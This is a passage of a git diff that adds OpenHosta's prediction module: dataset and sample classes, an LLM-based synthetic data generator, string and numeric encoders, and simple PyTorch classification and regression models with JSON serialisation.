+ if sample.output is not None and not isinstance(sample.output, torch.Tensor):
+ if isinstance(sample.output, (int, float)):
+ sample._outputs = torch.tensor(sample.output, dtype=dtype)
+ else:
+ sample._outputs = torch.tensor(sample.output, dtype=dtype)
+
+ def tensorify_inference(self, dtype=None) -> None:
+ """
+ Convertit les données d'inférence en tenseurs
+ """
+ if dtype is None:
+ dtype = torch.float32
+
+ if not isinstance(self.inference.input, torch.Tensor):
+ self.inference._inputs = torch.tensor(self.inference.input, dtype=dtype)
+
+ def prepare_inference(self, inference_data: dict) -> None:
+ """
+ Prépare les données d'inférence en les encodant et les convertissant en tenseurs
+ """
+ self.inference = Sample(inference_data)
+ self.encode_inference()
+ self.tensorify_inference()
+
+ @staticmethod
+ def from_input(inference_data: dict, verbose: int = 0) -> 'HostaDataset':
+ """
+ Crée un dataset à partir de données d'inférence
+ """
+ dataset = HostaDataset(verbose)
+ dataset.prepare_inference(inference_data)
+ return dataset
+
+ def decode(self, predictions: List[Any], func_f_type: Any) -> List[Any]:
+ """
+ Decode the model predictions based on the function's return type.
+ """
+ if self._encoder is None:
+ raise ValueError("Dataset must be encoded before decoding")
+
+ # Check if func_f_type is a typing.Literal
+ # if isinstance(func_f_type, typing._GenericAlias) and get_origin() is Literal:
+
+ # if get_origin(func_f_type) is Literal:
+ # Return decoded predictions using the encoder
+ # return [self._encoder.decode_prediction(pred) for pred in predictions]
+ # else:
+ decoded_predictions = []
+ for pred in predictions:
+ pred_value = pred.detach().cpu().numpy()
+ # Convert pred_value to the expected type
+ # Handle scalar and array predictions
+ if pred_value.size == 1:
+ pred_scalar = pred_value.item()
+ else:
+ pred_scalar = pred_value
+ try:
+ converted_pred = func_f_type(pred_scalar)
+ except (TypeError, ValueError):
+ converted_pred = pred_scalar # Return as is if conversion fails
+ decoded_predictions.append(converted_pred)
+ if func_f_type != list:
+ decoded_predictions = decoded_predictions[0]
+ return decoded_predictions
+
+ @staticmethod
+ def from_files(path: str, source_type: Optional[SourceType], verbose: int = 1) -> 'HostaDataset':
+ """
+ Load a dataset from a file.
+ """
+ dataset = HostaDataset(verbose)
+ dataset.convert_files(path, source_type)
+ return dataset
+
+ @staticmethod
+ def from_list(data: list, verbose: int) -> 'HostaDataset':
+ """
+ Create a dataset from a list.
+ """
+ dataset = HostaDataset(verbose)
+ dataset.convert_list(data)
+ return dataset
+
+
+ @staticmethod
+ def __len__(self):
+ return len(self.data)
+
+ def __iter__(self):
+ return iter(self.data)
diff --git a/src/OpenHosta/exec/predict/dataset/oracle.py b/src/OpenHosta/exec/predict/dataset/oracle.py
new file mode 100644
index 0000000..abccebd
--- /dev/null
+++ b/src/OpenHosta/exec/predict/dataset/oracle.py
@@ -0,0 +1,220 @@
+import inspect
+from typing import Optional, Dict, Any, List, Type, Union, get_args, Literal
+
+from ....core.config import Model, DefaultManager
+from ....core.hosta import Func
+
+_PROMPT = "{func_name}{signature}:\n \"\"\"{docstring}\"\"\"\n\nIMPORTANT RULES:\n1. Input values should respect the type hints\n2. Output values MUST be diverse - avoid generating the same output repeatedly\n3. Each row must be in CSV format\n4. For text outputs, enclose them in double quotes\n5. NO MORE THAN 20% of outputs should be the same value\n6. Generate inputs across the entire possible range\n7. Ensure proper formatting for {return_type} output type"
+
+
+
+class LLMSyntheticDataGenerator:
+ """Generates synthetic data using a Language Model."""
+
+
+ @staticmethod
+ def _validate_row(row: str, expected_fields: List[Type]) -> Optional[List[Union[str, float]]]:
+ try:
+ values = row.strip().split(',')
+
+ if len(values) != len(expected_fields):
+ return None
+
+ result = []
+
+ for value, expected_type in zip(values, expected_fields):
+ if expected_type == str:
+ result.append(value)
+
+ elif expected_type == float:
+ result.append(float(value))
+
+ elif expected_type == int:
+ result.append(float(value)) # Convert to integer
+
+ elif expected_type == bool:
+ if value.lower() == "true":
+ result.append(True)
+ elif value.lower() == "false":
+ result.append(False)
+ else:
+ return None
+
+ elif getattr(expected_type, '__origin__', None) is Literal:
+ valid_literals = get_args(expected_type)
+ if value in valid_literals:
+ result.append(value)
+ else:
+ return None # Invalid Literal
+
+ elif getattr(expected_type, '__origin__', None) is Union and type(None) in get_args(expected_type):
+ non_none_types = [t for t in get_args(expected_type) if t is not type(None)]
+ for t in non_none_types:
+ if t == int:
+ try:
+ result.append(int(value))
+ break
+ except ValueError:
+ continue
+ elif t == float:
+ try:
+ result.append(float(value))
+ break
+ except ValueError:
+ continue
+ elif t == str:
+ result.append(value)
+ break
+ else:
+ return None
+ else:
+ return None
+ return result
+ except (ValueError, TypeError):
+ return None
+
+ @staticmethod
+ def _format_example(input_val: Any, output_val: Any) -> str:
+ """
+ Format a single example based on _inputs/_outputs types.
+ """
+ if isinstance(input_val, (list, tuple)):
+ input_str = ','.join(map(str, input_val))
+ else:
+ input_str = str(input_val)
+
+ if isinstance(output_val, str):
+ output_str = f'{output_val}' # Enclose strings in quotes
+ else:
+ output_str = str(output_val)
+
+ return f"{input_str},{output_str}"
+
+ @staticmethod
+ def _build_user_prompt(
+ examples: List[Dict],
+ func: Func,
+ output_type: Type,
+ examples_in_req: int,
+ ):
+ user_prompt = ""
+
+ if examples:
+ user_prompt += "\nReference examples (Input → Output):\n"
+ for input_val, output_val in examples.items():
+ user_prompt += f"{LLMSyntheticDataGenerator._format_example(input_val, output_val)}\n"
+
+ user_prompt += f"\n\nGenerate {examples_in_req} new DIVERSE _inputs-_outputs pairs, one per line, in CSV format"
+ if output_type == str:
+ user_prompt += " (remember to enclose string _outputs in quotes ex: \"_outputs\")"
+ user_prompt += ":\n"
+
+ user_prompt += f"{','.join(func.f_sig.parameters.keys())},_outputs"
+ user_prompt += f"\n{','.join([str(f"\n- {a} is type {b.annotation.__name__ if b.annotation != inspect.Parameter.empty else 'Any'}")\
+ for a, b in func.f_sig.parameters.items()])}\n"
+ user_prompt += f"- _outputs is type {output_type.__name__}\n"
+
+ return user_prompt
+
+
+ @staticmethod
+ def generate_synthetic_data(
+ func: Func, # The function to generate data for
+ request_amounts: int = 3, # Amount of requests to the model
+ examples_in_req: int = 50, # Examples amount in each request
+ model: Optional[Model] = None # Model to use for data generation
+ ) -> List[Dict]:
+ input_types: Dict[str, Type] = dict(zip(func.f_args.keys(), func.f_type[0]))
+ output_type: Type = func.f_type[1]
+ examples: List[Dict] = []
+ if func.f_mem:
+ for ex in func.f_mem:
+ ex_inputes = list(ex.value["in_"].values())
+ ex_output = ex.value["out"]
+ to_append = {}
+ for i, key in enumerate(input_types.keys()):
+ to_append[key] = ex_inputes[i]
+ to_append["_outputs"] = ex_output
+
+ if not model:
+ model = DefaultManager.get_default_model()
+
+ try:
+ assert input_types and len(input_types) > 0, "Input types must be provided."
+ assert output_type, "Output type must be provided."
+ assert request_amounts > 0, "Request amount must be greater than 0."
+ assert examples_in_req > 0, "Examples amount in each request must be greater than 0."
+ assert model, "Model must be provided."
+ except AssertionError as e:
+ raise ValueError(f"Invalid parameters: {e}")
+
+ prompt: str = (
+ _PROMPT
+ .replace("{func_name}", func.f_name)
+ .replace("{signature}", str(func.f_sig))
+ .replace("{docstring}", func.f_doc)
+ )
+ prompt += LLMSyntheticDataGenerator._build_user_prompt(examples, func, output_type, examples_in_req)
+
+ generated_data: List = []
+ result: List[Dict] = []
+ conversation_history: List = []
+ attempts = 0
+ expected_fields = len(input_types) + 1
+
+ conversation_history.append({
+ "role": "system",
+ "content": "You are a data generation assistant focused on creating diverse, realistic data. Avoid repetitive patterns."
+ })
+
+ while attempts < request_amounts:
+ try:
+ content = prompt
+
+ # Add information about already generated data
+ if generated_data:
+ already_generated = "\nAlready generated data (please avoid these exact combinations):\n"
+ for row in generated_data:
+ already_generated += f"{','.join(map(str, row))}\n"
+ content += already_generated
+
+ # Add the user message to conversation history
+ conversation_history.append({
+ "role": "user",
+ "content": content
+ })
+
+ response = model.api_call(
+ messages=conversation_history,
+ temperature=1.0,
+ json_form=False,
+ )
+
+ # Add the assistant's response to conversation history
+ conversation_history.append({
+ "role": "assistant",
+ "content": response["choices"][0]["message"]["content"]
+ })
+
+ rows = response["choices"][0]["message"]["content"].strip().split('\n')
+
+ for row in rows:
+ cleaned_row = LLMSyntheticDataGenerator._validate_row(row, list(input_types.values()) + [output_type])
+ if cleaned_row:
+ if cleaned_row not in generated_data:
+ dictrow = dict(zip(input_types.keys(), cleaned_row[:-1]))
+ dictrow["_outputs"] = cleaned_row[-1]
+ result.append(dictrow)
+ generated_data.append(cleaned_row)
+
+ # Keep conversation history manageable by keeping only last 10 messages
+ if len(conversation_history) > 10:
+ # Always keep the system message
+ conversation_history = [conversation_history[0]] + conversation_history[-9:]
+
+ except Exception as e:
+ print(f"Error during generation: {e} line {e.__traceback__.tb_lineno}")
+
+ attempts += 1
+
+ return result
diff --git a/src/OpenHosta/exec/predict/dataset/sample_type.py b/src/OpenHosta/exec/predict/dataset/sample_type.py
new file mode 100644
index 0000000..67277db
--- /dev/null
+++ b/src/OpenHosta/exec/predict/dataset/sample_type.py
@@ -0,0 +1,67 @@
+from typing import List, Any, Optional
+
+# from pydantic import BaseModel
+
+
+class Sample:
+ """
+ A class to handle data samples for machine learning.
+ Expects a dictionary where all keys except '_outputs' are considered as _inputs.
+
+ Example:
+ data = {
+ 'feature1': [1, 2], # Any key except '_outputs' is considered _inputs
+ 'feature2': {'a': 3}, # Can contain any nested structure
+ 'feature3': 4, # Can contain any primitive type
+ 'feature4': BaseModel(), # Can contain Pydantic models
+ '_outputs': 9 # Optional _outputs
+ }
+ sample = Sample(data)
+ """
+
+ def __init__(self, data: dict):
+ if not isinstance(data, dict):
+ raise TypeError("Data must be a dictionary")
+
+ self._inputs: List[Any] = []
+ self._outputs: Optional[Any] = None
+
+ output_data = data.pop('_outputs', None)
+ if output_data is not None:
+ output_flattened = self._flatten_data(output_data)
+ self._outputs = output_flattened[0] if len(output_flattened) == 1 else output_flattened
+
+ for value in data.values():
+ self.input.extend(self._flatten_data(value))
+
+ def _flatten_data(self, data: Any) -> List[Any]:
+ """
+ Flatten any nested data structure into a list.
+ Handles: BaseModel, dict, list/tuple, primitive types
+ """
+ # if isinstance(data, BaseModel):
+ # return self._flatten_data(data.model_dump())
+ if isinstance(data, dict):
+ result = []
+ for value in data.values():
+ result.extend(self._flatten_data(value))
+ return result
+ if isinstance(data, (list, tuple)):
+ result = []
+ for item in data:
+ result.extend(self._flatten_data(item))
+ return result
+ return [data]
+
+ @property
+ def input(self) -> List[Any]:
+ """Get the _inputs features"""
+ return self._inputs
+
+ @property
+ def output(self) -> Optional[Any]:
+ """Get the _outputs label (None if no _outputs was provided)"""
+ return self._outputs
+
+ def __repr__(self) -> str:
+ return f"Sample(_inputs={self.input}, _outputs={self.output})"
diff --git a/src/OpenHosta/exec/predict/encoder/__init__.py b/src/OpenHosta/exec/predict/encoder/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/OpenHosta/exec/predict/encoder/base_encoder.py b/src/OpenHosta/exec/predict/encoder/base_encoder.py
new file mode 100644
index 0000000..b052f40
--- /dev/null
+++ b/src/OpenHosta/exec/predict/encoder/base_encoder.py
@@ -0,0 +1,13 @@
+from abc import ABC, abstractmethod
+from typing import Union,Any
+
+class BaseEncoder(ABC):
+ @abstractmethod
+ def encode(self, data: Any) -> Union[int, float]:
+ """Encode a single value"""
+ pass
+
+ @abstractmethod
+ def decode(self, encoded_value: Any) -> Any:
+ """Decode a prediction back to its original type"""
+ pass
diff --git a/src/OpenHosta/exec/predict/encoder/simple_encoder.py b/src/OpenHosta/exec/predict/encoder/simple_encoder.py
new file mode 100644
index 0000000..a738320
--- /dev/null
+++ b/src/OpenHosta/exec/predict/encoder/simple_encoder.py
@@ -0,0 +1,126 @@
+from typing import List, Any, Dict, Union
+
+from .base_encoder import BaseEncoder
+from ..dataset.sample_type import Sample
+
+
+class NumericEncoder(BaseEncoder):
+ def encode(self, value: Union[int, float]) -> float:
+ return float(value)
+
+ def decode(self, encoded_value: float) -> Union[int, float]:
+ return encoded_value
+
+class BooleanEncoder(BaseEncoder):
+ def encode(self, value: bool) -> int:
+ return int(value)
+
+ def decode(self, encoded_value: int) -> bool:
+ return bool(encoded_value)
+
+class StringEncoder(BaseEncoder):
+ def __init__(self, existing_dict: Dict[str, int] = None):
+ """
+ Initialize with optional existing dictionary.
+ If existing_dict is provided, we're in inference mode.
+ """
+ self.inference_mode = existing_dict is not None
+ self.word_to_id = {'<UNK>': 0} if existing_dict is None else existing_dict
+ self.id_to_word = {v: k for k, v in self.word_to_id.items()}
+ self.next_id = max(self.word_to_id.values()) + 1 if self.word_to_id else 1
+ self.max_tokens = None
+
+ def set_max_tokens(self, max_tokens: int):
+ """Set maximum length for encoded sequences"""
+ self.max_tokens = max_tokens
+
+ def encode(self, value: str) -> List[int]:
+ """
+ Encode a string into a list of integers.
+ For classification (_outputs), returns a single integer.
+ For _inputs features, returns a list of integers of length max_tokens.
+ """
+ if self.max_tokens is None:
+ raise ValueError("max_tokens must be set before encoding")
+
+ words = str(value).lower().strip().split()
+ encoded = []
+
+ for word in words:
+ if not self.inference_mode and word not in self.word_to_id:
+ self.word_to_id[word] = self.next_id
+ self.id_to_word[self.next_id] = word
+ self.next_id += 1
+ encoded.append(self.word_to_id.get(word, 0))
+
+ if len(encoded) > self.max_tokens:
+ return encoded[:self.max_tokens]
+ return encoded + [0] * (self.max_tokens - len(encoded))
+
+ def decode(self, encoded_value: Union[int, List[int]]) -> str:
+ """
+ Decode either a single integer (classification) or list of integers (features)
+ """
+ if isinstance(encoded_value, (int, float)):
+ return self.id_to_word.get(int(encoded_value), '<UNK>')
+
+ words = []
+ for idx in encoded_value:
+ if idx != 0: # Skip padding
+ words.append(self.id_to_word.get(idx, '<UNK>'))
+ return ' '.join(words)
+
+class SimpleEncoder:
+ def __init__(self, existing_dict: Dict[str, int] = None):
+ self.string_encoder = StringEncoder(existing_dict)
+ self.feature_types = {}
+ self.encoders = {
+ str: self.string_encoder,
+ int: NumericEncoder(),
+ float: NumericEncoder(),
+ bool: BooleanEncoder()
+ }
+
+ def encode(self, samples: List[Sample], max_tokens: int) -> List[Sample]:
+ self.string_encoder.set_max_tokens(max_tokens)
+
+ encoded_samples = []
+ for sample in samples:
+ encoded_input = []
+ for idx, value in enumerate(sample.input):
+ encoder = self.encoders[type(value)]
+ self.feature_types[idx] = type(value)
+ encoded_value = encoder.encode(value)
+ if isinstance(encoded_value, list):
+ encoded_input.extend(encoded_value)
+ else:
+ encoded_input.append(encoded_value)
+
+ encoded_output = None
+ if sample.output is not None:
+ if isinstance(sample.output, str):
+ print("\033[93mWarning: Multiple string _outputs not supported, only using the first word will be used for _outputs\033[0m")
+ output_idx = len(sample.input)
+ encoder = self.encoders[type(sample.output)]
+ self.feature_types[output_idx] = type(sample.output)
+ encoded_output = encoder.encode(sample.output)
+ # Like multiple str _outputs not supported only use the first str _outputs
+ if isinstance(encoded_output, list):
+ encoded_output = encoded_output[0]
+
+ encoded_samples.append(Sample({
+ '_inputs': encoded_input,
+ '_outputs': encoded_output
+ }))
+
+ return encoded_samples
+
+ def decode_prediction(self, prediction: Any, position: int) -> Any:
+ if position not in self.feature_types:
+ raise ValueError(f"Unknown feature position: {position}")
+
+ return self.encoders[self.feature_types[position]].decode(prediction)
+
+ @property
+ def dictionary(self) -> Dict[str, int]:
+ return self.string_encoder.word_to_id
diff --git a/src/OpenHosta/exec/predict/model/__init__.py b/src/OpenHosta/exec/predict/model/__init__.py
new file mode 100644
index 0000000..92fbcca
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/__init__.py
@@ -0,0 +1,9 @@
+from .hosta_model import HostaModel
+from .model_provider import HostaModelProvider
+from .neural_network_types import ArchitectureType
+
+all = (
+ 'ArchitectureType',
+ 'HostaModel',
+ 'HostaModelProvider',
+)
\ No newline at end of file
diff --git a/src/OpenHosta/exec/predict/model/builtins/__init__.py b/src/OpenHosta/exec/predict/model/builtins/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/OpenHosta/exec/predict/model/builtins/classification.py b/src/OpenHosta/exec/predict/model/builtins/classification.py
new file mode 100644
index 0000000..d08aabd
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/builtins/classification.py
@@ -0,0 +1,146 @@
+### NOT IMPLEMENTED YET ###
+
+from typing import Optional
+
+import torch
+from torch import nn
+from torch import optim
+
+from ..hosta_model import HostaModel
+from ..neural_network import NeuralNetwork
+from .....utils.torch_nn_utils import custom_optimizer_to_pytorch, custom_loss_to_pytorch, custom_layer_to_pytorch
+
+
+class Classification(HostaModel):
+ def __init__(self, neural_network: Optional[NeuralNetwork], input_size: int, output_size: int, complexity: int, num_classes: int, device: Optional[str] = None):
+ super().__init__(device)
+
+ self.complexity = complexity
+ self.num_classes = num_classes
+ self.verbose = True
+ self.layers = []
+ if neural_network is None or neural_network.layers is None or len(neural_network.layers) == 0:
+ transition_value = int(((input_size * output_size) / 2) * self.complexity)
+
+ input_layer = int(input_size * (2 * self.complexity))
+ if input_size > output_size:
+ hidden_layer_1 = int(transition_value / output_size)
+ else:
+ hidden_layer_1 = transition_value
+
+ # Define simple fully connected architecture
+ self.layers.append(nn.Linear(input_size, input_layer))
+ self.layers.append(nn.ReLU()) # Apply ReLU after first layer
+ self.layers.append(nn.Linear(input_layer, hidden_layer_1))
+ self.layers.append(nn.ReLU()) # Apply ReLU after second layer
+ self.layers.append(nn.Linear(hidden_layer_1, output_size))
+ else:
+ # Use custom user-defined layers from neural network definition if available
+ self.layers = [custom_layer_to_pytorch(layer) for layer in neural_network.layers]
+
+ for i, layer in enumerate(self.layers):
+ setattr(self, f'fc{i + 1}', layer)
+
+ # Set the loss function for classification
+ if neural_network is None or neural_network.loss_function is None:
+ if num_classes == 2:
+ self.loss = nn.BCEWithLogitsLoss() # For binary classification
+ else:
+ self.loss = nn.CrossEntropyLoss() # For multi-class classification
+ else:
+ self.loss = custom_loss_to_pytorch(neural_network.loss_function)
+
+ # Set the optimizer
+ if neural_network is None or neural_network.optimizer is None:
+ self.optimizer = optim.Adam(self.parameters(), lr=0.001)
+ else:
+ self.optimizer = custom_optimizer_to_pytorch(neural_network.optimizer, self, lr=0.001)
+
+ # Move model to the selected device (CPU or GPU)
+ self.to(self.device)
+
+
+ def trainer(self, train_set, epochs):
+ self.train()
+
+ for epoch in range(epochs):
+ running_loss = 0.0
+ correct = 0
+ total = 0
+ for inputs, labels in train_set:
+ inputs, labels = inputs.to(self.device), labels.to(self.device)
+
+ # Zero parameter gradients
+ self.optimizer.zero_grad()
+
+ # Forward pass
+ outputs = self(inputs)
+
+ if self.num_classes == 2:
+ preds = (torch.sigmoid(outputs) > 0.5).float()
+ else:
+ preds = torch.argmax(outputs, dim=1)
+
+ # Compute Loss
+ loss = self.loss(outputs, labels)
+ loss.backward()
+ self.optimizer.step()
+
+ running_loss += loss.item()
+
+ # Calculate accuracy
+ if self.num_classes == 2:
+ correct += (preds == labels).sum().item()
+ else:
+ correct += (preds == labels.argmax(dim=1)).sum().item()
+
+ total += labels.size(0)
+
+ accuracy = correct / total
+ if self.verbose:
+ print(f"Epoch {epoch + 1}/{epochs}, Loss: {running_loss / len(train_set):.4f}, Accuracy: {accuracy * 100:.2f}%")
+
+ def validate(self, validation_set):
+ """Validate the model's performance"""
+ self.eval() # Set model to evaluation mode
+ validation_loss = 0.0
+ correct = 0
+ total = 0
+ with torch.no_grad():
+ for inputs, labels in validation_set:
+ inputs, labels = inputs.to(self.device), labels.to(self.device)
+ outputs = self(inputs)
+
+ loss = self.loss(outputs, labels)
+ validation_loss += loss.item()
+
+ # For Classification Metrics (like binary or multi-class accuracy)
+ if self.num_classes == 2:
+ # Binary classification: Apply sigmoid and threshold at 0.5
+ preds = (torch.sigmoid(outputs) > 0.5).float()
+ correct += (preds == labels).sum().item()
+ else:
+ # Multi-class classification: Use argmax to get class labels
+ preds = torch.softmax(outputs, dim=1)
+ correct += (preds == labels.argmax(dim=1)).sum().item()
+
+ total += labels.size(0)
+
+ avg_val_loss = validation_loss / len(validation_set)
+ accuracy = correct / total
+ print(f"Validation Loss: {avg_val_loss:.4f}, Accuracy: {accuracy * 100:.2f}%")
+
+ return avg_val_loss, accuracy
+
+
+ def inference(self, x):
+ """Make prediction on a _inputs inference the model"""
+ self.eval()
+ with torch.no_grad():
+ x = x.to(self.device)
+ outputs = self(x)
+ if self.num_classes == 2:
+ prediction = (torch.sigmoid(outputs) > 0.5).float()
+ else:
+ prediction = torch.softmax(outputs, dim=1)
+ return prediction.cpu()
diff --git a/src/OpenHosta/exec/predict/model/builtins/linear_regression.py b/src/OpenHosta/exec/predict/model/builtins/linear_regression.py
new file mode 100644
index 0000000..9838899
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/builtins/linear_regression.py
@@ -0,0 +1,97 @@
+from typing import Optional
+
+import torch
+from torch import nn
+from torch import optim
+
+from ..hosta_model import HostaModel
+from ..neural_network import NeuralNetwork
+from .....utils.torch_nn_utils import custom_optimizer_to_pytorch, custom_loss_to_pytorch, custom_layer_to_pytorch
+
+
+class LinearRegression(HostaModel):
+ def __init__(self, neural_network: Optional[NeuralNetwork], input_size: int, output_size: int, complexity: int, device: Optional[str] = None):
+ super().__init__(device)
+
+ self.complexity = complexity
+
+ self.layers = []
+ if neural_network is None or neural_network.layers is None or len(neural_network.layers) == 0:
+ transition_value = int(((input_size * output_size) / 2) * self.complexity)
+
+ input_layer = int(input_size * (2 * self.complexity))
+ if input_size > output_size:
+ hidden_layer_1 = int(transition_value / output_size)
+ else:
+ hidden_layer_1 = transition_value
+
+ self.layers.append(nn.Linear(input_size, input_layer))
+ self.layers.append(nn.ReLU())
+ self.layers.append(nn.Linear(input_layer, hidden_layer_1))
+ self.layers.append(nn.ReLU())
+ self.layers.append(nn.Linear(hidden_layer_1, output_size))
+ else:
+ self.layers = [custom_layer_to_pytorch(layer) for layer in neural_network.layers]
+
+ for i, layer in enumerate(self.layers):
+ setattr(self, f'fc{i + 1}', layer)
+
+ # Set the loss function
+ if neural_network is None or neural_network.loss_function is None:
+ self.loss = nn.MSELoss()
+ else:
+ self.loss = custom_loss_to_pytorch(neural_network.loss_function)
+
+ # Set the optimizer
+ if neural_network is None or neural_network.optimizer is None:
+ self.optimizer = optim.Adam(self.parameters(), lr=0.001)
+ else:
+ self.optimizer = custom_optimizer_to_pytorch(neural_network.optimizer, self, lr=0.001)
+
+ # Move model to the selected device (CPU or GPU)
+ self.to(self.device)
+
+ def trainer(self, train_set, epochs, verbose=False):
+ self.train()
+
+ for epoch in range(epochs):
+ running_loss = 0.0
+ for inputs, labels in train_set:
+ # Move _inputs and labels to the right device
+ inputs, labels = inputs.to(self.device), labels.to(self.device)
+
+ # Zero the parameter gradients
+ self.optimizer.zero_grad()
+
+ # Forward pass
+ outputs = self(inputs)
+
+ loss = self.loss(outputs, labels)
+
+ # Backward pass and update
+ loss.backward()
+ self.optimizer.step()
+
+ running_loss += loss.item()
+ # if verbose:
+ print(f"Epoch {epoch + 1}/{epochs}, Loss: {running_loss / len(train_set)}")
+
+ def validate(self, validation_set):
+ """Validate the model on a given validation set."""
+ self.eval() # Set model to eval mode (disable dropout, etc.)
+ validation_loss = 0.0
+ with torch.no_grad(): # No need to track gradients during validation
+ for inputs, labels in validation_set:
+ inputs, labels = inputs.to(self.device), labels.to(self.device)
+ outputs = self(inputs)
+ loss = self.loss(outputs, labels)
+ validation_loss += loss.item()
+ return validation_loss / len(validation_set)
+
+ def inference(self, x):
+ """Make predictions for the given test set."""
+ self.eval()
+ with torch.no_grad():
+ x = x.to(self.device)
+ outputs = self(x)
+ return outputs
diff --git a/src/OpenHosta/exec/predict/model/hosta_model.py b/src/OpenHosta/exec/predict/model/hosta_model.py
new file mode 100644
index 0000000..08df057
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/hosta_model.py
@@ -0,0 +1,33 @@
+from abc import ABC
+from typing import Optional
+
+import torch
+from torch import nn
+
+
+class HostaModel(ABC, nn.Module):
+ def __init__(self, device: Optional[str]):
+ self.device = device if device is not None else ('cuda' if torch.cuda.is_available() else 'cpu')
+ self.layers = []
+ super().__init__()
+
+ def trainer(self, train_set, epochs):
+ pass
+
+ def forward(self, x):
+ for layer in self.layers:
+ x = layer(x)
+ return x
+
+ def validate(self, validation_set):
+ pass
+
+ def inference(self, x):
+ pass
+
+ def init_weights(self, path: str):
+ self.load_state_dict(torch.load(path, weights_only=True, map_location=self.device))
+ self.eval()
+
+ def save_weights(self, path: str):
+ torch.save(self.state_dict(), path, )
diff --git a/src/OpenHosta/exec/predict/model/model_provider.py b/src/OpenHosta/exec/predict/model/model_provider.py
new file mode 100644
index 0000000..dc221c2
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/model_provider.py
@@ -0,0 +1,34 @@
+from typing import Optional, Literal, get_origin
+
+from .builtins.classification import Classification
+from .builtins.linear_regression import LinearRegression
+from .hosta_model import HostaModel
+from .neural_network import NeuralNetwork
+from .neural_network_types import ArchitectureType
+from ..predict_config import PredictConfig
+from ....core.hosta import Func
+from ....utils.torch_nn_utils import type_size
+
+
+class HostaModelProvider:
+ @staticmethod
+ def from_hosta_func(func: Func, config: Optional[PredictConfig], architecture: Optional[NeuralNetwork], path: str, verbose: int) -> Optional[HostaModel]:
+ input_size = 0
+ for arg in func.f_type[0]:
+ input_size += type_size(arg, config.max_tokens)
+ output_size = type_size(func.f_type[1], config.max_tokens)
+ hosta_model: Optional[HostaModel] = None
+ if config is not None and config.model_type is not None:
+ if config.model_type == ArchitectureType.LINEAR_REGRESSION:
+ hosta_model = LinearRegression(architecture, input_size, output_size, config.complexity)
+ elif config.model_type == ArchitectureType.CLASSIFICATION:
+ hosta_model = Classification(architecture, input_size, output_size, config.complexity, 1)
+ else:
+ if get_origin(func.f_type[1]) == Literal:
+ hosta_model = Classification(architecture, input_size, output_size, 4, 1)
+ else:
+ hosta_model = LinearRegression(architecture, input_size, output_size, 4)
+
+ with open(path, 'w') as file:
+ file.write(NeuralNetwork.from_torch_nn(hosta_model).to_json())
+ return hosta_model
diff --git a/src/OpenHosta/exec/predict/model/neural_network.py b/src/OpenHosta/exec/predict/model/neural_network.py
new file mode 100644
index 0000000..ae61278
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/neural_network.py
@@ -0,0 +1,155 @@
+import json
+from typing import Optional
+
+from torch import nn
+
+from .neural_network_types import LayerType, OptimizerAlgorithm, LossFunction, Layer
+from ....utils.torch_nn_utils import pytorch_layer_to_custom, pytorch_loss_to_custom, pytorch_optimizer_to_custom
+
+
+class NeuralNetwork:
+ def __init__(self):
+ """
+ Initialize a NeuralNetwork object.
+ """
+ self.layers: list[Layer] = []
+ self.loss_function: Optional[LossFunction] = None
+ self.optimizer: Optional[OptimizerAlgorithm] = None
+
+ def add_layer(self, layer: Layer):
+ """
+ Add a layer to the neural network.
+
+ :param layer: The layer to be added.
+ :type layer: Layer
+ :raises TypeError: If the _inputs is not an instance of Layer.
+ """
+ if not isinstance(layer, Layer):
+ raise TypeError("Expected a Layer instance")
+ self.layers.append(layer)
+
+ def summary(self):
+ """
+ Print a summary of the neural network layers.
+ """
+ for i, layer in enumerate(self.layers):
+ print(f"Layer {i + 1}: {layer}")
+
+ def set_loss_function(self, loss_function: LossFunction):
+ """
+ Set the loss function for the neural network.
+
+ :param loss_function: The loss function to be set.
+ :type loss_function: LossFunction
+ """
+ self.loss_function = loss_function
+
+ def set_optimizer(self, optimizer: OptimizerAlgorithm):
+ """
+ Set the optimizer for the neural network.
+
+ :param optimizer: The optimizer to be set.
+ :type optimizer: OptimizerAlgorithm
+ """
+ self.optimizer = optimizer
+
+ def to_json(self) -> str:
+ """
+ Convert the neural network configuration to a JSON string.
+
+ :return: JSON string representation of the neural network
+ :rtype: str
+ """
+ network_dict = {
+ "layers": [
+ layer.to_json()
+ for layer in self.layers
+ ]
+ }
+ if self.loss_function is not None:
+ network_dict["loss_function"] = self.loss_function.name
+ if self.optimizer is not None:
+ network_dict["optimizer"] = self.optimizer.name
+ return json.dumps(network_dict, indent=2)
+
+ @classmethod
+ def from_json(cls, json_str: str) -> 'NeuralNetwork':
+ """
+ Create a neural network from a JSON string configuration.
+
+ :param json_str: JSON string containing the neural network configuration
+ :type json_str: str
+ :return: A new NeuralNetwork instance
+ :rtype: NeuralNetwork
+ :raises ValueError: If the JSON string is invalid or contains invalid configuration
+ """
+ try:
+ network_dict = json.loads(json_str)
+ network = cls()
+
+ if network_dict.get("loss_function", None) is not None:
+ network.loss_function = LossFunction[network_dict.get("loss_function", None)]
+ else:
+ network.loss_function = None
+
+ if network_dict.get("optimizer", None) is not None:
+ network.optimizer = OptimizerAlgorithm[network_dict.get("optimizer", None)]
+ else:
+ network.optimizer = None
+
+ # Add layers
+ for layer_dict in network_dict.get("layers", []):
+ layer = Layer(
+ layer_type=LayerType[layer_dict.get("layer_type", None)],
+ in_features=layer_dict.get("in_features"),
+ out_features=layer_dict.get("out_features"),
+ kernel_size=layer_dict.get("kernel_size"),
+ stride=layer_dict.get("stride"),
+ padding=layer_dict.get("padding"),
+ dropout=layer_dict.get("dropout")
+ )
+ network.add_layer(layer)
+
+ return network
+
+ except (json.JSONDecodeError, KeyError, ValueError) as e:
+ raise ValueError(f"Invalid JSON configuration: {str(e)}")
+
+
+ @classmethod
+ def from_torch_nn(cls, torch_model: nn.Module, loss_fn=None, optimizer=None) -> 'NeuralNetwork':
+ """
+ Creates a NeuralNetwork instance from a torch.nn.Module model,
+ with optional loss function and optimizer mappings.
+
+ :param torch_model: The PyTorch neural network model.
+ :param loss_fn: PyTorch loss function instance (optional).
+ :param optimizer: PyTorch optimizer instance (optional).
+ :return: A NeuralNetwork instance.
+ """
+ network = cls()
+
+ # Iterating through the PyTorch model's children (layers)
